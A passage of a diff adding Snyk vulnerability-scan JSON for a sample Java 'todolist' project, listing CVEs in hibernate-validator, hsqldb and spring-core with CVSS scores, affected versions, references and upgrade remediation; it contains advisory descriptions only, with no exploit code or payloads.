"4.3.7.Final" + }, + { + "id": "SNYK-JAVA-ORGHIBERNATE-30098", + "title": "JSM bypass via ReflectionHelper", + "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[4.1.0.Beta1, 4.3.2.Final)", + "[5.0.0.Final,5.1.2.Final)" + ] + }, + "exploit": "Not Defined", + "fixedIn": [ + "4.3.2.Final", + "5.1.2.Final" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "medium", + "cvssScore": 5.3, + "functions": [], + "malicious": false, + "isDisputed": false, + "moduleName": "org.hibernate:hibernate-validator", + "references": [ + { + "url": "https://github.com/hibernate/hibernate-validator/commit/2c95d4ea0ef20977be249e31a4a4f4f4f71c945d", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/hibernate/hibernate-validator/commit/67fdff14831c035c25e098fe14bd86523d17f726", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/hibernate/hibernate-validator/commit/7e7131939a4361a7cad3e77ab89a8462132c561c", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/hibernate/hibernate-validator/commit/c489416f699a46859c134796b3ccfea41ef3ce52", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/hibernate/hibernate-validator/commit/c9525ca544b1281e2b7c7347e86e87c86dc1dc6e", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/hibernate/hibernate-validator/commit/e8c42b689df8c6752d635d02c6518da3fece3870", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/hibernate/hibernate-validator/commit/f97c2021a03c825abdeca1692f5be51e77e76a8f", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/hibernate/hibernate-validator/commit/fd4eaed7fb930db6a5e4c03742b4b3adcfecc90e", + "title": "GitHub Commit" + }, + { + "url": "https://hibernate.atlassian.net/browse/HV-912", + "title": "Jira Issue" + }, + { + "url": "https://bugzilla.redhat.com/CVE-2014-3558", + "title": "Redhat Bugzilla" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "medium", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", + "cvssV3BaseScore": 5.3, + "modificationTime": "2024-03-11T09:46:09.119807Z" + }, + { + "assigner": "Red Hat", + "severity": "medium", + "cvssV3Vector": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N", + "cvssV3BaseScore": 4.4, + "modificationTime": "2024-03-11T09:48:45.778673Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", + "assigner": "Snyk", + "severity": "medium", + "baseScore": 5.3, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T14:01:48.734535Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", + "assigner": "NVD", + "severity": "medium", + "baseScore": 5.3, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:46:09.119807Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N", + "assigner": "Red Hat", + "severity": "medium", + "baseScore": 4.4, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:48:45.778673Z" + } + ], + "description": "## Overview\n[org.hibernate:hibernate-validator](https://mvnrepository.com/artifact/org.hibernate/hibernate-validator) is a Hibernate Validator Engine Relocation Artifact.\n\nAffected versions of this package are vulnerable to JSM bypass via ReflectionHelper. ReflectionHelper (`org.hibernate.validator.util.ReflectionHelper`) in Hibernate Validator 4.1.0 before 4.2.1, 4.3.x before 4.3.2, and 5.x before 5.1.2 allows attackers to bypass Java Security Manager (JSM) restrictions and execute restricted reflection calls via a crafted application.\n## Remediation\nUpgrade `org.hibernate:hibernate-validator` to version 4.3.2.Final, 5.1.2.Final or higher.\n## References\n- [GitHub Commit](https://github.com/hibernate/hibernate-validator/commit/2c95d4ea0ef20977be249e31a4a4f4f4f71c945d)\n- [GitHub Commit](https://github.com/hibernate/hibernate-validator/commit/67fdff14831c035c25e098fe14bd86523d17f726)\n- [GitHub Commit](https://github.com/hibernate/hibernate-validator/commit/7e7131939a4361a7cad3e77ab89a8462132c561c)\n- [GitHub Commit](https://github.com/hibernate/hibernate-validator/commit/c489416f699a46859c134796b3ccfea41ef3ce52)\n- [GitHub Commit](https://github.com/hibernate/hibernate-validator/commit/c9525ca544b1281e2b7c7347e86e87c86dc1dc6e)\n- [GitHub Commit](https://github.com/hibernate/hibernate-validator/commit/e8c42b689df8c6752d635d02c6518da3fece3870)\n- [GitHub Commit](https://github.com/hibernate/hibernate-validator/commit/f97c2021a03c825abdeca1692f5be51e77e76a8f)\n- [GitHub Commit](https://github.com/hibernate/hibernate-validator/commit/fd4eaed7fb930db6a5e4c03742b4b3adcfecc90e)\n- [Jira Issue](https://hibernate.atlassian.net/browse/HV-912)\n- [Redhat Bugzilla](https://bugzilla.redhat.com/CVE-2014-3558)\n", + "epssDetails": { + "percentile": "0.70800", + "probability": "0.00319", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2014-3558" + ], + "CWE": [ + "CWE-592" + ] + }, + "packageName": "org.hibernate:hibernate-validator", + "proprietary": false, + "creationTime": "2016-12-25T16:51:53Z", + "functions_new": [], + "alternativeIds": [], + "disclosureTime": "2014-07-17T16:51:53Z", + "exploitDetails": { + "sources": [], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Not Defined", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "org.hibernate", + "artifactId": "hibernate-validator" + }, + "publicationTime": "2014-07-17T16:51:53Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:48:45.778673Z", + "socialTrendAlert": false, + "severityWithCritical": "medium", + "from": [ + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "org.hibernate:hibernate-validator@4.3.1.Final" + ], + "upgradePath": [ + false, + "org.hibernate:hibernate-validator@6.0.23.Final" + ], + "isUpgradable": true, + "isPatchable": false, + "name": "org.hibernate:hibernate-validator", + "version": "4.3.1.Final" + }, + { + "id": "SNYK-JAVA-ORGHIBERNATE-568162", + "title": "Improper Input Validation", + "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", + "credit": [ + "Alvaro Muñoz" + ], + "semver": { + "vulnerable": [ + "[,6.0.19.Final)", + "[6.1.0,6.1.3.Final)" + ] + }, + "exploit": "Not Defined", + "fixedIn": [ + "6.0.19.Final", + "6.1.3.Final" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "medium", + "cvssScore": 5.3, + "functions": [ + { + "version": [ + "[,6.0.19.Final)", + "[6.1.0,6.1.3.Final)" + ], + "functionId": { + "filePath": "org/hibernate/validator/internal/engine/ValidatorImpl.java", + "className": "ValidatorImpl", + "functionName": "validate" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "org.hibernate:hibernate-validator", + "references": [ + { + "url": "https://github.com/hibernate/hibernate-validator/pull/1071", + "title": "GitHub PR" + }, + { + "url": "https://hibernate.atlassian.net/browse/HV-1758", + "title": "Jira Issue" + }, + { + "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1805501", + "title": "RedHat Bugzilla Bug" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "medium", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", + "cvssV3BaseScore": 5.3, + "modificationTime": "2024-03-11T09:50:18.797394Z" + }, + { + "assigner": "Red Hat", + "severity": "medium", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", + "cvssV3BaseScore": 5.3, + "modificationTime": "2024-03-11T09:54:00.490090Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", + "assigner": "Snyk", + "severity": "medium", + "baseScore": 5.3, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:58:37.379564Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", + "assigner": "NVD", + "severity": "medium", + "baseScore": 5.3, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:50:18.797394Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", + "assigner": "Red Hat", + "severity": "medium", + "baseScore": 5.3, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:54:00.490090Z" + } + ], + "description": "## Overview\n[org.hibernate:hibernate-validator](https://mvnrepository.com/artifact/org.hibernate/hibernate-validator) is a Hibernate Validator Engine Relocation Artifact.\n\nAffected versions of this package are vulnerable to Improper Input Validation. A bug in the message interpolation processor enables invalid EL expressions to be evaluated as if they were valid. This flaw allows attackers to bypass input sanitation (escaping, stripping) controls that developers may have put in place when handling user-controlled data in error messages.\n## Remediation\nUpgrade `org.hibernate:hibernate-validator` to version 6.0.19.Final, 6.1.3.Final or higher.\n## References\n- [GitHub PR](https://github.com/hibernate/hibernate-validator/pull/1071)\n- [Jira Issue](https://hibernate.atlassian.net/browse/HV-1758)\n- [RedHat Bugzilla Bug](https://bugzilla.redhat.com/show_bug.cgi?id=1805501)\n", + "epssDetails": { + "percentile": "0.49937", + "probability": "0.00139", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2020-10693" + ], + "CWE": [ + "CWE-20" + ], + "GHSA": [ + "GHSA-rmrm-75hp-phr2" + ] + }, + "packageName": "org.hibernate:hibernate-validator", + "proprietary": false, + "creationTime": "2020-05-05T12:05:58.541980Z", + "functions_new": [ + { + "version": [ + "[,6.0.19.Final)", + "[6.1.0,6.1.3.Final)" + ], + "functionId": { + "className": "org.hibernate.validator.internal.engine.ValidatorImpl", + "functionName": "validate" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2020-05-05T00:00:00Z", + "exploitDetails": { + "sources": [], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Not Defined", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "org.hibernate", + "artifactId": "hibernate-validator" + }, + "publicationTime": "2020-05-05T16:32:46Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:54:00.490090Z", + "socialTrendAlert": false, + "severityWithCritical": "medium", + "from": [ + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "org.hibernate:hibernate-validator@4.3.1.Final" + ], + "upgradePath": [ + false, + "org.hibernate:hibernate-validator@6.0.23.Final" + ], + "isUpgradable": true, + "isPatchable": false, + "name": "org.hibernate:hibernate-validator", + "version": "4.3.1.Final" + }, + { + "id": "SNYK-JAVA-ORGHIBERNATE-569100", + "title": "Cross-site Scripting (XSS)", + "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N/E:U/RL:O/RC:R", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[,6.0.18.Final)", + "[6.1.0.Alpha1,6.1.0.Final)" + ] + }, + "exploit": "Unproven", + "fixedIn": [ + "6.0.18.Final", + "6.1.0.Final" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "medium", + "cvssScore": 6.5, + "functions": [ + { + "version": [ + "[,6.0.18.Final)", + "[6.1.0.Alpha1,6.1.0.Final)" + ], + "functionId": { + "filePath": "org/hibernate/validator/internal/constraintvalidators/hv/SafeHtmlValidator.java", + "className": "SafeHtmlValidator", + "functionName": "getFragmentAsDocument" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "org.hibernate:hibernate-validator", + "references": [ + { + "url": "https://lists.apache.org/thread.html/r87b7e2d22982b4ca9f88f5f4f22a19b394d2662415b233582ed22ebf@%3Cnotifications.accumulo.apache.org%3E", + "title": "Apache Security Advisory" + }, + { + "url": "https://github.com/hibernate/hibernate-validator/commit/124b7dd6d9a4ad24d4d49f74701f05a13e56ceee", + "title": "GitHub Commit" + }, + { + "url": "https://in.relation.to/2019/11/20/hibernate-validator-610-6018-released/", + "title": "Hibernator Security Release Blog" + }, + { + "url": "https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2019-10219", + "title": "RedHat Bugzilla Bug" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "medium", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", + "cvssV3BaseScore": 6.1, + "modificationTime": "2024-03-11T09:51:34.418099Z" + }, + { + "assigner": "Red Hat", + "severity": "medium", + "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N", + "cvssV3BaseScore": 6.5, + "modificationTime": "2024-03-11T09:54:00.455389Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N/E:U/RL:O/RC:R", + "assigner": "Snyk", + "severity": "medium", + "baseScore": 6.5, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T14:01:47.749976Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", + "assigner": "NVD", + "severity": "medium", + "baseScore": 6.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:51:34.418099Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N", + "assigner": "Red Hat", + "severity": "medium", + "baseScore": 6.5, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:54:00.455389Z" + } + ], + "description": "## Overview\n[org.hibernate:hibernate-validator](https://mvnrepository.com/artifact/org.hibernate/hibernate-validator) is a Hibernate Validator Engine Relocation Artifact.\n\nAffected versions of this package are vulnerable to Cross-site Scripting (XSS). The `SafeHtml` validator annotation fails to properly sanitize payloads consisting of potentially malicious code in HTML comments and instructions.\n## Details\n\nA cross-site scripting attack occurs when the attacker tricks a legitimate web-based application or site to accept a request as originating from a trusted source.\n\nThis is done by escaping the context of the web application; the web application then delivers that data to its users along with other trusted dynamic content, without validating it. The browser unknowingly executes malicious script on the client side (through client-side languages; usually JavaScript or HTML) in order to perform actions that are otherwise typically blocked by the browser’s Same Origin Policy.\n\nInjecting malicious code is the most prevalent manner by which XSS is exploited; for this reason, escaping characters in order to prevent this manipulation is the top method for securing code against this vulnerability.\n\nEscaping means that the application is coded to mark key characters, and particularly key characters included in user input, to prevent those characters from being interpreted in a dangerous context. For example, in HTML, `<` can be coded as `<`; and `>` can be coded as `>`; in order to be interpreted and displayed as themselves in text, while within the code itself, they are used for HTML tags. If malicious content is injected into an application that escapes special characters and that malicious content uses `<` and `>` as HTML tags, those characters are nonetheless not interpreted as HTML tags by the browser if they’ve been correctly escaped in the application code and in this way the attempted attack is diverted.\n \nThe most prominent use of XSS is to steal cookies (source: OWASP HttpOnly) and hijack user sessions, but XSS exploits have been used to expose sensitive information, enable access to privileged services and functionality and deliver malware. \n\n### Types of attacks\nThere are a few methods by which XSS can be manipulated:\n\n|Type|Origin|Description|\n|--|--|--|\n|**Stored**|Server|The malicious code is inserted in the application (usually as a link) by the attacker. The code is activated every time a user clicks the link.|\n|**Reflected**|Server|The attacker delivers a malicious link externally from the vulnerable web site application to a user. When clicked, malicious code is sent to the vulnerable web site, which reflects the attack back to the user’s browser.| \n|**DOM-based**|Client|The attacker forces the user’s browser to render a malicious page. The data in the page itself delivers the cross-site scripting data.|\n|**Mutated**| |The attacker injects code that appears safe, but is then rewritten and modified by the browser, while parsing the markup. An example is rebalancing unclosed quotation marks or even adding quotation marks to unquoted parameters.|\n\n### Affected environments\nThe following environments are susceptible to an XSS attack:\n\n* Web servers\n* Application servers\n* Web application environments\n\n### How to prevent\nThis section describes the top best practices designed to specifically protect your code: \n\n* Sanitize data input in an HTTP request before reflecting it back, ensuring all data is validated, filtered or escaped before echoing anything back to the user, such as the values of query parameters during searches. \n* Convert special characters such as `?`, `&`, `/`, `<`, `>` and spaces to their respective HTML or URL encoded equivalents. \n* Give users the option to disable client-side scripts.\n* Redirect invalid requests.\n* Detect simultaneous logins, including those from two separate IP addresses, and invalidate those sessions.\n* Use and enforce a Content Security Policy (source: Wikipedia) to disable any features that might be manipulated for an XSS attack.\n* Read the documentation for any of the libraries referenced in your code to understand which elements allow for embedded HTML.\n\n## Remediation\nUpgrade `org.hibernate:hibernate-validator` to version 6.0.18.Final, 6.1.0.Final or higher.\n## References\n- [Apache Security Advisory](https://lists.apache.org/thread.html/r87b7e2d22982b4ca9f88f5f4f22a19b394d2662415b233582ed22ebf@%3Cnotifications.accumulo.apache.org%3E)\n- [GitHub Commit](https://github.com/hibernate/hibernate-validator/commit/124b7dd6d9a4ad24d4d49f74701f05a13e56ceee)\n- [Hibernator Security Release Blog](https://in.relation.to/2019/11/20/hibernate-validator-610-6018-released/)\n- [RedHat Bugzilla Bug](https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2019-10219)\n", + "epssDetails": { + "percentile": "0.61710", + "probability": "0.00232", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2019-10219" + ], + "CWE": [ + "CWE-79" + ] + }, + "packageName": "org.hibernate:hibernate-validator", + "proprietary": false, + "creationTime": "2020-05-14T16:07:06.897969Z", + "functions_new": [ + { + "version": [ + "[,6.0.18.Final)", + "[6.1.0.Alpha1,6.1.0.Final)" + ], + "functionId": { + "className": "org.hibernate.validator.internal.constraintvalidators.hv.SafeHtmlValidator", + "functionName": "getFragmentAsDocument" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2018-10-18T14:55:21Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "org.hibernate", + "artifactId": "hibernate-validator" + }, + "publicationTime": "2020-01-09T14:55:12Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:54:00.455389Z", + "socialTrendAlert": false, + "severityWithCritical": "medium", + "from": [ + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "org.hibernate:hibernate-validator@4.3.1.Final" + ], + "upgradePath": [ + false, + "org.hibernate:hibernate-validator@6.0.23.Final" + ], + "isUpgradable": true, + "isPatchable": false, + "name": "org.hibernate:hibernate-validator", + "version": "4.3.1.Final" + }, + { + "id": "SNYK-JAVA-ORGHSQLDB-3040860", + "title": "Remote Code Execution (RCE)", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:C/C:H/I:H/A:H", + "credit": [ + "OSS Fuzz Team" + ], + "semver": { + "vulnerable": [ + "[,2.7.1)" + ] + }, + "exploit": "Not Defined", + "fixedIn": [ + "2.7.1" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8, + "functions": [], + "malicious": false, + "isDisputed": false, + "moduleName": "org.hsqldb:hsqldb", + "references": [ + { + "url": "https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=50212%23c7", + "title": "Chromium Bugs" + }, + { + "url": "https://github.com/ryenus/hsqldb/commit/b6719c67b41eb9298c2451ad2829bf03b262a941", + "title": "GitHub Commit" + }, + { + "url": "http://hsqldb.org/doc/2.0/guide/sqlroutines-chapt.html%23src_jrt_access_control", + "title": "Mitigation" + }, + { + "url": "https://sourceforge.net/p/hsqldb/svn/6614/tree//base/trunk/src/org/hsqldb/persist/HsqlDatabaseProperties.java", + "title": "SVN Commit" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "critical", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 9.8, + "modificationTime": "2024-03-11T09:51:53.988304Z" + }, + { + "assigner": "Red Hat", + "severity": "critical", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 9.8, + "modificationTime": "2024-03-11T09:53:59.414572Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:C/C:H/I:H/A:H", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T14:05:55.045961Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "critical", + "baseScore": 9.8, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:51:53.988304Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Red Hat", + "severity": "critical", + "baseScore": 9.8, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:53:59.414572Z" + } + ], + "description": "## Overview\n\nAffected versions of this package are vulnerable to Remote Code Execution (RCE) when using `java.sql.Statement` or `java.sql.PreparedStatement` to process untrusted input. By default, it is allowed to call any static method of any Java class in the classpath resulting in code execution.\n\n## Workaround\nUsers who are unable to upgrade to the fixed version can set the system property `hsqldb.method_class_names` to classes which are allowed to be called. For example, `System.setProperty(\"hsqldb.method_class_names\", \"abc\")` or Java argument `-Dhsqldb.method_class_names=\"abc\"` can be used.\n## Remediation\nUpgrade `org.hsqldb:hsqldb` to version 2.7.1 or higher.\n## References\n- [Chromium Bugs](https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=50212#c7)\n- [GitHub Commit](https://github.com/ryenus/hsqldb/commit/b6719c67b41eb9298c2451ad2829bf03b262a941)\n- [Mitigation](http://hsqldb.org/doc/2.0/guide/sqlroutines-chapt.html#src_jrt_access_control)\n- [SVN Commit](https://sourceforge.net/p/hsqldb/svn/6614/tree//base/trunk/src/org/hsqldb/persist/HsqlDatabaseProperties.java)\n", + "epssDetails": { + "percentile": "0.85801", + "probability": "0.01274", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2022-41853" + ], + "CWE": [ + "CWE-94" + ], + "GHSA": [ + "GHSA-77xx-rxvh-q682" + ] + }, + "packageName": "org.hsqldb:hsqldb", + "proprietary": false, + "creationTime": "2022-10-07T07:26:42.276748Z", + "functions_new": [], + "alternativeIds": [], + "disclosureTime": "2022-10-06T18:52:05Z", + "exploitDetails": { + "sources": [], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Not Defined", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "org.hsqldb", + "artifactId": "hsqldb" + }, + "publicationTime": "2022-10-07T07:26:42.515068Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:53:59.414572Z", + "socialTrendAlert": false, + "severityWithCritical": "high", + "from": [ + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-core@0.0.1-SNAPSHOT", + "org.hsqldb:hsqldb@2.3.2" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "name": "org.hsqldb:hsqldb", + "version": "2.3.2" + }, + { + "id": "SNYK-JAVA-ORGSPRINGFRAMEWORK-2329097", + "title": "Improper Output Neutralization for Logs", + "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N", + "credit": [ + "Dennis Kennedy" + ], + "semver": { + "vulnerable": [ + "[5.3.0,5.3.12)", + "[,5.2.18)" + ] + }, + "exploit": "Not Defined", + "fixedIn": [ + "5.3.12", + "5.2.18" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "medium", + "cvssScore": 4.3, + "functions": [], + "malicious": false, + "isDisputed": false, + "moduleName": "org.springframework:spring-core", + "references": [ + { + "url": "https://github.com/spring-projects/spring-framework/commit/346b75580267dc5d8d257be198d5841ce4e1add5", + "title": "Github Commit" + }, + { + "url": "https://pivotal.io/security/cve-2021-22096", + "title": "Pivotal Security Advisory" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "medium", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N", + "cvssV3BaseScore": 4.3, + "modificationTime": "2024-03-11T09:48:36.610042Z" + }, + { + "assigner": "Red Hat", + "severity": "medium", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N", + "cvssV3BaseScore": 4.3, + "modificationTime": "2024-03-11T09:53:48.086414Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N", + "assigner": "Snyk", + "severity": "medium", + "baseScore": 4.3, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T14:05:20.847607Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N", + "assigner": "NVD", + "severity": "medium", + "baseScore": 4.3, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:48:36.610042Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N", + "assigner": "Red Hat", + "severity": "medium", + "baseScore": 4.3, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:53:48.086414Z" + } + ], + "description": "## Overview\n[org.springframework:spring-core](http://search.maven.org/#search%7Cga%7C1%7Ca%3A%22spring-core%22) is a core package within the spring-framework that contains multiple classes and utilities.\n\nAffected versions of this package are vulnerable to Improper Output Neutralization for Logs when a user provides malicious input, causing insertion of additional log entries.\n## Remediation\nUpgrade `org.springframework:spring-core` to version 5.3.12, 5.2.18 or higher.\n## References\n- [Github Commit](https://github.com/spring-projects/spring-framework/commit/346b75580267dc5d8d257be198d5841ce4e1add5)\n- [Pivotal Security Advisory](https://pivotal.io/security/cve-2021-22096)\n", + "epssDetails": { + "percentile": "0.34533", + "probability": "0.00079", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2021-22096" + ], + "CWE": [ + "CWE-20" + ] + }, + "packageName": "org.springframework:spring-core", + "proprietary": false, + "creationTime": "2022-01-02T11:14:46.053186Z", + "functions_new": [], + "alternativeIds": [], + "disclosureTime": "2021-10-27T12:52:59Z", + "exploitDetails": { + "sources": [], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Not Defined", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "org.springframework", + "artifactId": "spring-core" + }, + "publicationTime": "2021-10-27T16:55:13Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:53:48.086414Z", + "socialTrendAlert": false, + "severityWithCritical": "medium", + "from": [ + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-core@0.0.1-SNAPSHOT", + "org.springframework:spring-context@3.2.6.RELEASE", + "org.springframework:spring-core@3.2.6.RELEASE" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "name": "org.springframework:spring-core", + "version": "3.2.6.RELEASE" + }, + { + "id": "SNYK-JAVA-ORGSPRINGFRAMEWORK-2330878", + "title": "Improper Input Validation", + "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N", + "credit": [ + "psytester" + ], + "semver": { + "vulnerable": [ + "[,5.2.19.RELEASE)", + "[5.3.0,5.3.14)" + ] + }, + "exploit": "Not Defined", + "fixedIn": [ + "5.2.19.RELEASE", + "5.3.14" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "medium", + "cvssScore": 4.3, + "functions": [], + "malicious": false, + "isDisputed": false, + "moduleName": "org.springframework:spring-core", + "references": [ + { + "url": "https://pivotal.io/security/cve-2021-22060", + "title": "Pivotal Security Advisory" + } + ], + "cvssDetails": [ + { + "assigner": "Red Hat", + "severity": "medium", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N", + "cvssV3BaseScore": 4.3, + "modificationTime": "2024-03-11T09:48:34.544783Z" + }, + { + "assigner": "NVD", + "severity": "medium", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N", + "cvssV3BaseScore": 4.3, + "modificationTime": "2024-03-11T09:49:10.667113Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N", + "assigner": "Snyk", + "severity": "medium", + "baseScore": 4.3, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T14:01:24.703024Z" + }, + { + "type": "secondary", + "vector": 